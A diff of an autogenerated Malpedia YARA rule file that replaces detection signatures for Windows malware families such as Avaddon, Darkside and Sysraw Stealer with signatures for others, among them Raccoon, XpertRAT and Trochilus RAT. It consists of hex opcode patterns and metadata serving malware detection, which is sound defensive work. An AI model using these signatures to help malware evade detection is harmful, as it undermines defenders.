MALPEDIA_Win_Sys10_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a03 68???????? 68???????? 51 52 50 ff15???????? } - $sequence_1 = { 837e04ff 740b 8b16 52 e8???????? 83c404 } - $sequence_2 = { 8b4e0c 51 ff15???????? 8b5608 6aff 52 ff15???????? } - $sequence_3 = { 56 e8???????? 83c404 85c0 74c6 8b4c2410 896e10 } - $sequence_4 = { 6810270000 ff15???????? 33c0 59 } - $sequence_5 = { 837e04ff 740b 8b16 52 } - $sequence_6 = { 56 89442414 e8???????? 83c404 85c0 7541 } - $sequence_7 = { 52 6a05 50 ffd6 8b5308 } - $sequence_8 = { 8d4c2413 51 6800400000 52 50 e8???????? } - $sequence_9 = { 8b13 52 ffd7 8b4304 50 ffd7 8b4b08 } + $sequence_0 = { b904000000 e8???????? 8d55c4 66b8c503 e8???????? 8b55c4 a1???????? } + $sequence_1 = { 0f8c88000000 8d4df4 8b55f8 8b45f8 e8???????? 8b55f4 8d45f8 } + $sequence_2 = { 83c220 8d45f8 e8???????? 8d45f8 e8???????? 8945f4 8b45f4 } + $sequence_3 = { 33c0 55 68???????? 64ff30 648920 8bcb b230 } + $sequence_4 = { 85db 7410 8b55f4 8b45ec 8bcb e8???????? } + $sequence_5 = { 8b45cc e8???????? 8bd8 891d???????? 891d???????? 8d45c8 50 } + $sequence_6 = { 01d0 c1e003 8b803c58bc6d 8945ec e9???????? 837de808 } + $sequence_7 = { a1???????? e8???????? 8bd0 53 8bc2 e9???????? 33c0 } + $sequence_8 = { 0342fc 8945ec 8b45f8 8b00 8b5508 0342fc 8945f0 } + $sequence_9 = { b808000000 e8???????? 8b55f8 58 e8???????? 7504 33db } condition: - 7 of them and filesize <286720 + 7 of them and filesize <1146880 } -rule MALPEDIA_Win_H1N1_Auto : FILE +rule MALPEDIA_Win_Hotcroissant_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5e13a49f-72f0-5eb3-a885-2e0245e8f66e" + id = "250e256f-bf01-5062-b0b5-f902754e1ec1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.h1n1_auto.yar#L1-L170" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hotcroissant_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "842ef63a8a089830b40dfc0f60da9194950df4056683b94edaa8a18caec3ebbd" + logic_hash = "2f7df521e2093bda16bb20427bf0af1885ac8e8db0533585bb878e9befdcfdd1" score = 75 quality = 75 tags = "FILE" @@ -182389,40 +185096,34 @@ rule MALPEDIA_Win_H1N1_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 49 85c9 0f8527ffffff ff75f8 } - $sequence_1 = { 49 75b6 8bcf 2b4d0c 83e103 } - $sequence_2 = { 83bdecfeffff01 7505 bb07000000 93 5b c9 c3 } - $sequence_3 = { aa ac 0ac0 740e 3c3d 740a e8???????? } - $sequence_4 = { 0345f4 8b8ba4000000 85c9 742b } - $sequence_5 = { ff7508 6a00 ff35???????? 58 ffd0 } - $sequence_6 = { 351f5b5742 ab 05f8383ad2 ab ff75fc } - $sequence_7 = { 59 85c0 75d1 83bb8000000000 7465 } - $sequence_8 = { 8d8614850010 50 ffb610850010 57 } - $sequence_9 = { 59 c3 56 8b742408 6804010000 68f8820010 } - $sequence_10 = { 330c85908f0010 42 3b54240c 72e4 f7d1 8bc1 } - $sequence_11 = { 57 8d3c95c0850010 8b0f 334f04 23cb } - $sequence_12 = { 330d???????? 5b 8bc1 83e001 d1e9 330c8500850010 330d???????? } - $sequence_13 = { 57 50 e8???????? 68f4600010 56 } - $sequence_14 = { 33d2 a3???????? 42 b9c0850010 8b01 c1e81e 3301 } - $sequence_15 = { 6800800010 ff742410 e8???????? 6823af2930 56 ff742410 } + $sequence_0 = { c705????????01000000 ffd6 6800040000 68???????? } + $sequence_1 = { 68???????? 68???????? 68???????? c705????????0c000000 c705????????00000000 c705????????01000000 } + $sequence_2 = { 25ff7f0000 33c9 7707 3d00400000 7608 6a0a ff15???????? } + $sequence_3 = { 83e780 c1e307 33fb c1e711 c1e808 46 0bc7 } + $sequence_4 = { 85c0 7506 6a0a ffd6 } + $sequence_5 = { 6a00 68703a0000 6a00 50 ffd7 85c0 } + $sequence_6 = { e8???????? 6a00 c705????????00000000 ff15???????? 6a00 } + $sequence_7 = { 8d958cc5ffff 52 50 ff15???????? 85c0 } + $sequence_8 = { ff15???????? 85c0 7506 6a0a } + $sequence_9 = { 56 6a01 50 ff15???????? a1???????? } condition: - 7 of them and filesize <172032 + 7 of them and filesize <591872 } -rule MALPEDIA_Win_Sasfis_Auto : FILE +rule MALPEDIA_Win_Mosquito_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5e363129-1d9b-5d5a-8006-da18dff7062a" + id = "d845e95b-9b1b-51f7-92b1-5c116f68e381" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sasfis_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mosquito_auto.yar#L1-L192" license_url = "N/A" - logic_hash = "7eee2ccd93eb9390961368e951e0384a076b29fc7a953a6afc5b8df0aa798b71" + logic_hash = "87ba9d2670a970e725fcb73c4f11150d5260680ad8d699153882d887044e12b1" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -182434,32 +185135,43 @@ rule MALPEDIA_Win_Sasfis_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8433 a6 0d60ca8b0c 646b1a5c } - $sequence_1 = { d7 4b 7ca9 bc74460651 130d???????? 37 d502 } - $sequence_2 = { 157e2808b7 0016 2038 2410 } - $sequence_3 = { 60 0c1c 0430 00242c 1838 3c00 3808 } - $sequence_4 = { 84df 66ffc5 8b742448 66f7df } - $sequence_5 = { f9 f6c77d 660fbae10b 83c504 } - $sequence_6 = { 657326 6e 346f 6f 68432b3501 } - $sequence_7 = { 6681cf5b01 81ec9c000000 57 60 5f } - $sequence_8 = { 2909 26df6883 95 7800 e8???????? 15afb28a60 38342c } - $sequence_9 = { 260c16 005220 0410 1400 } + $sequence_0 = { f3a5 ff942464020000 81c450020000 85c0 } + $sequence_1 = { 52 50 6a00 6801c1fd7d } + $sequence_2 = { f7d8 1bc0 83e0b4 83c04c } + $sequence_3 = { 8b10 8bc8 57 6842730000 ff5204 56 } + $sequence_4 = { b994000000 8bfc f3a5 ff942464020000 } + $sequence_5 = { 8b10 8bc8 ff5204 56 } + $sequence_6 = { e8???????? 85c0 7517 8bcb e8???????? 8b7328 } + $sequence_7 = { e8???????? 6a20 e8???????? 83c40c } + $sequence_8 = { 8b00 33ff 57 6880000000 6a03 57 } + $sequence_9 = { e8???????? 6a20 8bf0 e8???????? 8bc8 } + $sequence_10 = { 8bfc f3a5 ff942460020000 81c450020000 } + $sequence_11 = { 6824080000 50 e8???????? 83c410 } + $sequence_12 = { 0000 006301 1000 7500 } + $sequence_13 = { 0000 0018 a0???????? 57 } + $sequence_14 = { 0000 0001 1001 c550f0 8b8078005900 } + $sequence_15 = { 0000 0032 08804d086440 5e } + $sequence_16 = { 0000 00645657 8b7dc2 0400 } + $sequence_17 = { 0000 006500 676c 0010 } + $sequence_18 = { ff15???????? 6a00 56 ff15???????? 8903 83f8ff } + $sequence_19 = { 0000 00748078 3001 40 } + $sequence_20 = { 6aff 5d c28bcf 7300 6a01 } condition: - 7 of them and filesize <8060928 + 7 of them and filesize <1015808 } -rule MALPEDIA_Win_Avaddon_Auto : FILE +rule MALPEDIA_Win_Xpertrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "63f23353-9bc4-58e9-928a-ae89a2672871" + id = "5a6115a3-5806-5873-b6ce-1ac58a01949b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avaddon_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xpertrat_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "a18db52df950b60c5b6d6008b561a4d13093802e02b6d570e4f6e8e4ed4f56e8" + logic_hash = "c8887b0fd33237ed86a90a507f71d2f7eed9cc8f7e7e530376d7c59ae0763d11" score = 75 quality = 75 tags = "FILE" @@ -182473,32 +185185,38 @@ rule MALPEDIA_Win_Avaddon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 55 8bec 83e4f8 8b11 83ec14 0faf5104 53 } - $sequence_1 = { 52 50 e8???????? 8bf0 8bfa 8b4508 03f3 } - $sequence_2 = { 8d4dcc e9???????? 8d4d88 e9???????? 8d4db4 e9???????? 8d4de4 } - $sequence_3 = { 8b4df0 e9???????? 8d4dbc e9???????? 8b542408 8d420c 8b4ac0 } - $sequence_4 = { 57 56 e8???????? 83c408 85c0 7535 837e6402 } - $sequence_5 = { 8bd0 e8???????? 8b5604 83c404 } - $sequence_6 = { ff75b4 e8???????? 83c408 47 897dac 81fffe000000 0f8654feffff } - $sequence_7 = { 8bc8 2bce 0fafcb 890a 83c204 8b4de4 41 } - $sequence_8 = { 034b08 4e 8b4588 6a00 52 51 56 } - $sequence_9 = { 8d4dd8 e8???????? c645fc0d 8b4f14 3b4f18 7437 c7411000000000 } + $sequence_0 = { 0870ff 0d80000700 0474 ff0478 } + $sequence_1 = { ff0a 250004003c 6c 70ff 0808 } + $sequence_2 = { ff05???????? 000d???????? 0878ff 0d98000700 6e 74ff } + $sequence_3 = { 0808 008f38001b26 001b 0d002a2364 ff08 } + $sequence_4 = { ff4d40 ff08 40 0430 ff0a 4c 000c00 } + $sequence_5 = { 0000 00a1cc004400 0bc0 7402 ffe0 68???????? } + $sequence_6 = { 0808 008a3800cc1c 5e 006c70ff 0808 } + $sequence_7 = { 007168 ff0468 ff0a 250004003c } + $sequence_8 = { ff15???????? 68fffe0000 ffd3 8bd0 } + $sequence_9 = { ff15???????? 68???????? ffd7 8b1d???????? } + $sequence_10 = { ff15???????? 6a00 6818000368 8b4508 } + $sequence_11 = { ff15???????? 68???????? ff15???????? 50 8d858cfeffff } + $sequence_12 = { ff15???????? 69c0e8030000 0f80b50a0000 50 } + $sequence_13 = { ff15???????? 6a00 6822000360 8b03 } + $sequence_14 = { ff15???????? 6a00 68???????? 6a00 68???????? 8b55e0 } + $sequence_15 = { ff15???????? 6a00 6806000368 8b4dd4 } condition: - 7 of them and filesize <2343936 + 7 of them and filesize <8560640 } -rule MALPEDIA_Win_Darkside_Auto : FILE +rule MALPEDIA_Win_Trochilus_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4e98e522-42dc-58c9-8c11-9325d3b56f3a" + id = "59484933-96f5-5392-a130-d1897de1bd22" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkside_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.trochilus_rat_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "e40a0efe65c9a50695ac0381c3b73c18492ef0b0fce9893dbb25777c239f867f" + logic_hash = "e651983c70589c057f0ef7e60f3a8876ce52f4e099a0b1c41a830840b75beb3c" score = 75 quality = 75 tags = "FILE" @@ -182512,32 +185230,32 @@ rule MALPEDIA_Win_Darkside_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bd8 68ff000000 57 e8???????? 81c7ff000000 } - $sequence_1 = { 85d2 7407 52 57 } - $sequence_2 = { b9ff000000 33d2 f7f1 85c0 7418 } - $sequence_3 = { 57 e8???????? 81c7ff000000 4b } - $sequence_4 = { fec1 75d2 5f 5e 5a 59 5b } - $sequence_5 = { 56 57 b9f0000000 be???????? } - $sequence_6 = { 8b7d08 8b450c b9ff000000 33d2 f7f1 } - $sequence_7 = { 56 57 b9f0000000 be???????? 8b4508 } - $sequence_8 = { e8???????? 5f 5e 5a 59 5b 5d } - $sequence_9 = { 81ea10101010 2d10101010 81eb10101010 81ef10101010 } + $sequence_0 = { 0fb74636 50 ffd7 0fb7c8 668bd1 662b935e010100 } + $sequence_1 = { 6a32 56 53 e8???????? } + $sequence_2 = { 50 ffd3 668b8e52010100 662bc8 6683f903 0f8c9e000000 81863001010018fcffff } + $sequence_3 = { 56 8bf1 8d5e04 8bcb e8???????? 83f8ff 7407 } + $sequence_4 = { 8d4de4 51 50 ff7538 ff7534 } + $sequence_5 = { 5e 5d c20c00 55 8bec 837d08ff 56 } + $sequence_6 = { 68???????? 50 ff15???????? 85c0 7404 33c0 eb1a } + $sequence_7 = { ff15???????? 33c0 eb81 55 8bec 51 53 } + $sequence_8 = { 33db 391f 7e1d 8b4704 8b4c0304 68a01e0110 e8???????? } + $sequence_9 = { b8fac50010 e8???????? 8bf1 837d0800 7505 8b06 ff505c } condition: - 7 of them and filesize <286720 + 7 of them and filesize <630784 } -rule MALPEDIA_Win_Bamital_Auto : FILE +rule MALPEDIA_Win_Elise_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3baca492-b609-5d4f-80bb-c68e186e995b" + id = "f217246a-45c9-5e4c-8fe4-ae9bb248bda8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bamital_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.elise_auto.yar#L1-L163" license_url = "N/A" - logic_hash = "80aaa696b23b77db92b802971fab9d7fd90e414992e8440ec6c57f40448ba374" + logic_hash = "4bacbe3f48e2ba0fdae2760e38d43f9e3c8b071aa93c58355438ff735f59b16b" score = 75 quality = 75 tags = "FILE" @@ -182551,32 +185269,38 @@ rule MALPEDIA_Win_Bamital_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb05 83c001 ebe0 52 ff75fc e8???????? } - $sequence_1 = { 8ac4 8807 83c701 e2d8 c9 c20800 55 } - $sequence_2 = { ff75dc ff75d4 57 e8???????? 8b55fc 8945fc 0bd2 } - $sequence_3 = { e8???????? 8b55fc 8945fc 0bd2 } - $sequence_4 = { 0bc0 741f 50 83c001 50 } - $sequence_5 = { b800000000 c9 c20400 55 8bec 83c4f0 } - $sequence_6 = { 56 57 53 8b5d0c 8b7508 } - $sequence_7 = { ff7508 ff75f4 e8???????? 68e8070000 } - $sequence_8 = { 6a28 e8???????? 8945fc ff7508 e8???????? 8945f8 e8???????? } - $sequence_9 = { 8a07 3c39 7208 3c7e 7704 2c19 eb13 } + $sequence_0 = { 0f8461010000 8d847eee040000 50 e8???????? 85c0 } + $sequence_1 = { 8bd0 c1ea0b 0fafd7 3bf2 7312 b800080000 } + $sequence_2 = { 8bcb 8dbe06050000 f3ab 8bc2 8bcb } + $sequence_3 = { 33c9 33db 663b4e06 731a } + $sequence_4 = { 8bcf e8???????? 8365f400 c1e004 0145fc 33f6 46 } + $sequence_5 = { 894dec 8945f4 8dbeba0a0000 8bc3 8bce } + $sequence_6 = { 7cf5 33c9 888f00010000 888f01010000 } + $sequence_7 = { 8d3470 d3e0 0945f4 43 83fb04 72e1 8b45f4 } + $sequence_8 = { 888f00010000 888f01010000 8bf7 8945f8 } + $sequence_9 = { 8d3400 8b44240c 03c6 50 } + $sequence_10 = { eb02 d1e8 4e 75f1 } + $sequence_11 = { e8???????? 59 59 33c0 e9???????? 8b35???????? } + $sequence_12 = { 42 0fb6fa 8a1c07 881c06 } + $sequence_13 = { 897df4 8b7d08 03df 0fb63c06 } + $sequence_14 = { 837d0c00 8a8800010000 8a9001010000 0f8e93000000 53 } + $sequence_15 = { 301f ff45f8 8b7df8 3b7d0c 0f8c7bffffff 5f 5e } condition: - 7 of them and filesize <90112 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Sysraw_Stealer_Auto : FILE +rule MALPEDIA_Win_Raccoon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a9e810a6-264f-569e-b3d3-a9931864293b" + id = "4a27386e-afe9-5aa0-b437-cb8672f32902" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sysraw_stealer_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.raccoon_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "a25f6b3ba819f069101fb648f9516e51ed0f5298199445e1b66fa7cef9e138d8" + logic_hash = "744c135940d1e7204980afbdf51c2b964c1deff72c5358a0844976025962517f" score = 75 quality = 75 tags = "FILE" @@ -182590,32 +185314,32 @@ rule MALPEDIA_Win_Sysraw_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8d9504ffffff 51 8d8508ffffff 52 8d8d0cffffff } - $sequence_1 = { ffd6 a1???????? ba???????? 8b4814 c1e102 8bf9 8b480c } - $sequence_2 = { 51 89558c ffd7 8b558c f7d8 1bc0 f7d8 } - $sequence_3 = { 7507 c745ec01000000 8b4514 8b7de8 2bc7 6800000040 } - $sequence_4 = { ff15???????? 8b4dc0 894dd4 8d55c4 52 } - $sequence_5 = { c7400807000000 c7400c0f000000 c740101f000000 c740143f000000 c740187f000000 } - $sequence_6 = { 89bde0feffff ffd6 8b3d???????? 50 } - $sequence_7 = { c7420485ae67bb 8b4590 c7400872f36e3c 8b4d90 c7410c3af54fa5 } - $sequence_8 = { 53 56 57 8bd0 8bf1 8bf8 8bd9 } - $sequence_9 = { 8975c8 8975b8 8975a8 ff15???????? 8b45d0 8975cc 50 } + $sequence_0 = { 8bf0 8975f0 85f6 7422 8d45ec c706???????? } + $sequence_1 = { e8???????? 68???????? eb31 51 } + $sequence_2 = { 8b45e8 3bc6 7c31 7f04 3bde 762b } + $sequence_3 = { 53 50 8d45e0 895dd0 } + $sequence_4 = { ff15???????? 8945f4 40 03c7 50 8945f0 } + $sequence_5 = { ff15???????? 8bf0 83feff 7437 837b1410 7202 8b1b } + $sequence_6 = { 8d45ec c706???????? 50 53 ff75e4 895dec ff15???????? } + $sequence_7 = { 57 33db 8bf9 53 6aff 53 } + $sequence_8 = { 6a01 52 52 52 52 } + $sequence_9 = { 0f85dd000000 57 57 57 57 8d45fc } condition: - 7 of them and filesize <1540096 + 7 of them and filesize <1212416 } -rule MALPEDIA_Win_Hoplight_Auto : FILE +rule MALPEDIA_Win_Upas_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d07c2fe2-ecaa-5d6d-9200-86c11ba23c84" + id = "4474338e-2402-5a41-aa33-f4db4dabe7ff" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hoplight_auto.yar#L1-L90" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.upas_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "247623c43b610ddcbb448aac3610ffa1141476124d800ee4677cf300abbf0143" + logic_hash = "13e71741a108b9f3493f31fa88f76272d0cb37e67292b4fc5655cf9c429831b0" score = 75 quality = 75 tags = "FILE" @@ -182629,30 +185353,32 @@ rule MALPEDIA_Win_Hoplight_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b4c2460 e8???????? 8b442428 488d0d5e680200 } - $sequence_1 = { 488b5260 8b0481 894208 488b842480000000 } - $sequence_2 = { 8b442424 25ff000000 8bc0 488d0d87740200 } - $sequence_3 = { 4889542420 4d8bc8 488b442440 4c8bc0 } - $sequence_4 = { 4c8bb42498040000 488b8d80030000 4833cc e8???????? } - $sequence_5 = { 488d4c2460 e8???????? 488b842470020000 488b4060 } - $sequence_6 = { 4833c4 48898424f8000000 c744242800000000 488b842410010000 } - $sequence_7 = { 4c8d05883c0300 488bd0 488b4c2450 e8???????? } + $sequence_0 = { 6a00 8d45f8 50 8d45f0 50 ff15???????? } + $sequence_1 = { ffd6 33c0 eb18 6a00 57 } + $sequence_2 = { ff751c e8???????? ff7620 ff763c e8???????? 8b4d10 8bd8 } + $sequence_3 = { ff15???????? 8945fc 3bc7 7504 33c0 eb64 56 } + $sequence_4 = { 50 53 ff15???????? 8945f4 3bc3 7504 } + $sequence_5 = { 83c420 53 6880000000 6a02 53 53 68000000c0 } + $sequence_6 = { 8944b5dc 837cb5dc00 59 59 7406 46 83fe07 } + $sequence_7 = { ff15???????? ff75e8 8d4598 6a22 50 e8???????? } + $sequence_8 = { 72d1 5e c3 8b442410 8b08 3b0d???????? } + $sequence_9 = { ff15???????? 85c0 742d 8d8500fdffff 50 } condition: - 7 of them and filesize <765952 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Selfmake_Auto : FILE +rule MALPEDIA_Win_Laziok_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ca04d6b7-e045-5526-8793-d9e1e0d359e9" + id = "1dcbce9e-9b01-55fc-82f2-025bf107fa98" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.selfmake_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.laziok_auto.yar#L1-L101" license_url = "N/A" - logic_hash = "c57531acfc321c5fdc74a4f21330394c8edf44f2f30ab3dcaf573b2b773dc0b6" + logic_hash = "8a49fb3e99a85f8254a739f5aaca9e9bb1b5be0f2dd72574e619043b4fccb1ed" score = 75 quality = 75 tags = "FILE" @@ -182666,32 +185392,30 @@ rule MALPEDIA_Win_Selfmake_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c104 3bf0 7ce3 68???????? } - $sequence_1 = { 83e107 894df4 8b55f4 52 ff15???????? a1???????? 8be5 } - $sequence_2 = { 8d742430 742e e8???????? 6aff } - $sequence_3 = { 47 84c0 75f8 66a1???????? 668907 8d44243c 8bd0 } - $sequence_4 = { 8945f8 837df800 7408 8b45f8 e9???????? e8???????? } - $sequence_5 = { 8b4b2c 6a00 6a01 51 ffd0 8b16 83c604 } - $sequence_6 = { 7604 2bf1 eb02 33f6 8b4310 25c0010000 83f840 } - $sequence_7 = { 81fa???????? 7209 83c014 3bc1 72eb } - $sequence_8 = { 51 e8???????? 8b742418 8bbc2418020000 } - $sequence_9 = { e8???????? 56 e8???????? 8b442424 8b35???????? 83c414 50 } + $sequence_0 = { 85f6 740b 837c240cff 8937 7502 } + $sequence_1 = { 47 68???????? 57 e8???????? 8bf0 59 } + $sequence_2 = { 8d85f4fdffff 50 e8???????? 33c0 668945fc } + $sequence_3 = { 68ffffff1f 52 e8???????? 83c410 c3 } + $sequence_4 = { e8???????? 83c420 5b c20400 } + $sequence_5 = { 56 8b7508 833e01 7513 6a00 ff7510 ff750c } + $sequence_6 = { 39742410 741b ff742410 ff15???????? 8bf0 } + $sequence_7 = { 56 57 ff74240c 33f6 ff35???????? e8???????? } condition: - 7 of them and filesize <932864 + 7 of them and filesize <688128 } -rule MALPEDIA_Win_Fireball_Auto : FILE +rule MALPEDIA_Win_Webbytea_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "41b2d4de-af91-5e95-ba91-5bc661ef7417" + id = "b6cb62e5-1486-5f7a-9ab4-363544b06e24" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fireball_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webbytea_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "0f627ea55086f489b8cd11c65d68f2e0680aa8b1619660718f20b28106c4357c" + logic_hash = "a39ccb63aa5f0dcb105213662a0cd0fec06d0e89771a8eab5add75ac05faf27d" score = 75 quality = 75 tags = "FILE" @@ -182705,32 +185429,32 @@ rule MALPEDIA_Win_Fireball_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 8bce e8???????? b101 e8???????? } - $sequence_1 = { 30a830ac30b0 30b830cc30e8 30f0 30f4 3010 3118 311c31 } - $sequence_2 = { 8b0f 8bc1 c1f805 83e11f 8b0485000a2500 c1e106 80640804fe } - $sequence_3 = { 68???????? 8d8c24a4000000 c78424b800000007000000 c78424b400000000000000 } - $sequence_4 = { c78424a400000000000000 6689842494000000 837c247808 720c ff742464 e8???????? } - $sequence_5 = { 53 ff15???????? 85c0 0f85c2feffff } - $sequence_6 = { c78518f5ffff07000000 c78514f5ffff00000000 66898504f5ffff 83bdf4f5ffff08 720e } - $sequence_7 = { c68558fbffff00 7504 33c9 eb12 8d8d64f9ffff } - $sequence_8 = { 8d442417 50 8d542434 8d8c2498000000 c744244c07000000 c744244800000000 e8???????? } - $sequence_9 = { 8bf1 c785e8fbffff00000000 e8???????? 83c40c 8d85ecfbffff 6808020000 } + $sequence_0 = { e9???????? c744242000000000 4533c9 4533c0 33d2 33c9 } + $sequence_1 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 } + $sequence_2 = { 8b00 ffc0 488b8c2488020000 8901 488d542430 488b4c2420 } + $sequence_3 = { 488b8c2488020000 8901 488d542430 488b4c2420 ff15???????? 85c0 } + $sequence_4 = { 488b842488020000 8b00 ffc0 488b8c2488020000 } + $sequence_5 = { eb08 8b0424 ffc0 890424 8b442438 390424 } + $sequence_6 = { 488b842488020000 8b00 ffc0 488b8c2488020000 8901 488d542430 488b4c2420 } + $sequence_7 = { c7042400000000 eb08 8b0424 ffc0 890424 8b442438 } + $sequence_8 = { 488b8c2488020000 8901 488d542430 488b4c2420 } + $sequence_9 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 c68424f500000065 } condition: - 7 of them and filesize <335872 + 7 of them and filesize <552960 } -rule MALPEDIA_Win_Hesperbot_Auto : FILE +rule MALPEDIA_Win_Sharpknot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a7df8c05-0ba7-5df5-beac-3b2d7fa2a54e" + id = "50369af8-b07e-5fc0-8a81-2caae560d6bb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hesperbot_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sharpknot_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "791429e92dde914e6ba42c9451f8338c991a26d1b1d12ebf3b674c1fb1ca0de1" + logic_hash = "c9ade7f96a822eb5e208dc6f180c2f1529ab39e41f40e8790faf2abbc1ccb7f4" score = 75 quality = 75 tags = "FILE" @@ -182744,77 +185468,71 @@ rule MALPEDIA_Win_Hesperbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33f0 8b442440 0b442438 33cf 23442448 8b7c2444 8b5c2440 } - $sequence_1 = { f60602 740e 8bc6 e8???????? 